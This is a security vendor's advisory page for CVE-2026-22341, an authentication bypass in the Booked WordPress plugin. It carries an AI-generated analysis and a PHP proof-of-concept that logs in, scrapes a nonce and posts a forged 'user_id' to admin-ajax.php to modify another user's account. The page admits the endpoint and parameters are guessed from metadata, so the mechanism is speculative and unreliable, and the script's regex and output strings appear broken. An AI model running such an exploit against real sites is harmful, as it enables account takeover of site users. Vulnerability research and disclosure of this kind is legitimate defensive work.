Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-22341: Booked <= 3.0.0 – Authentication Bypass (booked)

CVE ID CVE-2026-22341
Plugin booked
Severity Critical (CVSS 9.8)
CWE 288
Vulnerable Version 3.0.0
Patched Version
Disclosed January 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22341 (metadata-based):
This vulnerability is a critical authentication bypass in the Booked appointment booking plugin for WordPress, affecting all versions up to and including 3.0.0. The flaw allows authenticated attackers with at least ‘Custom-level’ access to impersonate other user accounts, leading to a complete loss of account isolation and confidentiality.

Atomic Edge research indicates the root cause is an authentication bypass using an alternate path or channel (CWE-288). The vulnerability description confirms authenticated attackers with ‘Custom-level access and above’ can bypass authentication to access other users’ accounts. Without a code diff, the exact mechanism is inferred. The likely failure is an improper authorization check on a user management or profile update function. The plugin may expose an endpoint, such as an AJAX handler or REST API route, that processes user identifiers without verifying the current user has the right to act on the target account. This creates an alternate channel for privilege escalation.

The exploitation method involves an authenticated attacker sending a crafted request to a plugin-specific endpoint. Based on WordPress plugin patterns, the attack likely targets an AJAX action like ‘booked_update_profile’ or a REST route under ‘/wp-json/booked/’. The malicious payload would contain a parameter, such as ‘user_id’ or ‘appointment_id’, manipulated to reference another user’s data. The attacker’s existing ‘Custom-level’ session provides a valid nonce or bypasses nonce verification entirely, allowing the request to be processed under the target’s context.

Remediation requires implementing proper authorization checks on all user-facing operations. The plugin must validate that the current user’s ID matches the ID of any account they are attempting to modify or access. This involves adding capability checks, such as ‘current_user_can(‘edit_user’, $target_user_id)’, and ensuring user-controlled identifiers are strictly mapped to the authenticated session. A secondary fix would enforce nonce verification on all state-changing AJAX handlers to prevent CSRF attacks that could compound this issue.

Successful exploitation grants an attacker full control over any user account accessible through the vulnerable endpoint. Impact includes viewing and modifying other users’ personal data, appointments, and payment information. Attackers can delete or reschedule appointments, causing business disruption. In multi-tenant or agency environments, this could lead to horizontal privilege escalation across clients. The CVSS 9.8 score reflects the network-based, low-complexity attack that compromises confidentiality, integrity, and availability without user interaction.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-22341 - Booked <= 3.0.0 - Authentication Bypass
<?php
/*
 * Proof of Concept for CVE-2026-22341.
 * This script simulates an authenticated attacker with 'Custom-level' access attempting to bypass authentication.
 * The exact vulnerable endpoint and parameters are inferred from the CWE and WordPress plugin conventions.
 * Assumptions:
 *   1. The attacker has valid WordPress credentials with 'Custom-level' role in the Booked plugin.
 *   2. The target user ID to impersonate is known or guessable (e.g., user_id=1 for admin).
 *   3. The vulnerable endpoint is an AJAX handler at /wp-admin/admin-ajax.php.
 *   4. The action parameter is 'booked_update_profile' or similar.
 *   5. A valid nonce is required but may be bypassed; the script attempts to retrieve one via a prior request.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$attacker_username = 'attacker'; // Attacker with Custom-level access
$attacker_password = 'password'; // Attacker's password
$target_user_id = 1; // ID of the user account to impersonate

// Step 1: Authenticate and obtain session cookies and a nonce.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $attacker_username,
        'pwd' => $attacker_password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);
$login_response = curl_exec($ch);

// Step 2: Fetch a page containing a Booked plugin nonce (e.g., the appointments page).
// The nonce may be embedded in JavaScript or a data attribute.
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin.php?page=booked-appointments',
    CURLOPT_POST => false,
    CURLOPT_HTTPGET => true,
    CURLOPT_HEADER => false
]);
$admin_page = curl_exec($ch);

// Extract a nonce (this regex is illustrative; the actual nonce name may vary).
preg_match('/"nonce"s*:s*"([a-f0-9]+)"/', $admin_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? 'invalid_nonce';

// Step 3: Craft the authentication bypass payload.
// The inferred parameter 'user_id' is changed to target another account.
$payload = [
    'action' => 'booked_update_profile', // Inferred AJAX action
    'user_id' => $target_user_id, // Manipulated parameter
    'field_name' => 'display_name', // Example field to modify
    'field_value' => 'Hacked Account', // New value demonstrating control
    'nonce' => $nonce
];

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $payload,
    CURLOPT_HEADER => true
]);
$ajax_response = curl_exec($ch);
curl_close($ch);

// Step 4: Check response for success indicators.
echo "Response:n" . $ajax_response . "n";
if (strpos($ajax_response, 'success') !== false || strpos($ajax_response, 'updated') !== false) {
    echo "[+] Potential authentication bypass successful. Target user $target_user_id may have been modified.n";
} else {
    echo "[-] Exploit attempt may have failed. The endpoint or parameters might differ.n";
}

// Cleanup
@unlink('cookies.txt');
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School